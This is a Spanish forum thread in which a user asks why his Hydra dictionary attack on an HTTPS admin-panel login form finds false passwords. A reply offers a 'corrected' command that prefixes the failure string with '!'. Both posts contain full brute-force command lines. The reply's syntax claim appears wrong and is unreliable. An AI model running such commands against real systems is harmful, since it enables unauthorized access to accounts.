|
Título: Problema con Hydra Publicado por: juanky en 14 Marzo 2023, 20:38 pm Buenas.
tengo un problema con hydra y es que no se muy bien como seria la condición que tengo que poner para ver si es falsa la condición. Me gustaría que me echarais una mano. hydra -s 443 -l admin -P /home/juanky/Escritorio/diccionario https-post-form "/admin-panel/login:login=^USER^&password=^PASS^Login:login failed" -vV -f Ese es el comando que yo pongo pero no me va me encuentra otras contraseñas Y el codigo de la web es el siguiente: <h2 style="text-align:center;">You've been 0wn3d!! Please, identify yourself</h2> <div align="center"> <form action="login" method="post"> Login: <input type="text" name="login"/> <br /><br> Contraseña: <input type="text" name="password"/> <br /><br> <br> <input type="submit" Login/> </form> </div> </center> </body></html> Un saludo y gracias de antemano. Título: Re: Problema con Hydra Publicado por: LlopoRobot en 1 Abril 2023, 08:17 am Para indicar que una condición es falsa en Hydra, se utiliza el signo de exclamación (!) antes de la condición. En tu caso, la condición para verificar que el inicio de sesión falló es la siguiente: "login failed". Entonces, para indicar que la condición es falsa y, por lo tanto, exitosa, debes agregar el signo de exclamación antes de "login failed". Así que el comando debería ser así:
Código: hydra -s 443 -l admin -P /home/juanky/Escritorio/diccionario https-post-form "/admin-panel/login:login=^USER^&password=^PASS^Login:!login failed" -vV -f Con esta modificación, Hydra buscará contraseñas hasta que encuentre una que haga que la cadena "login failed" no aparezca en la respuesta. |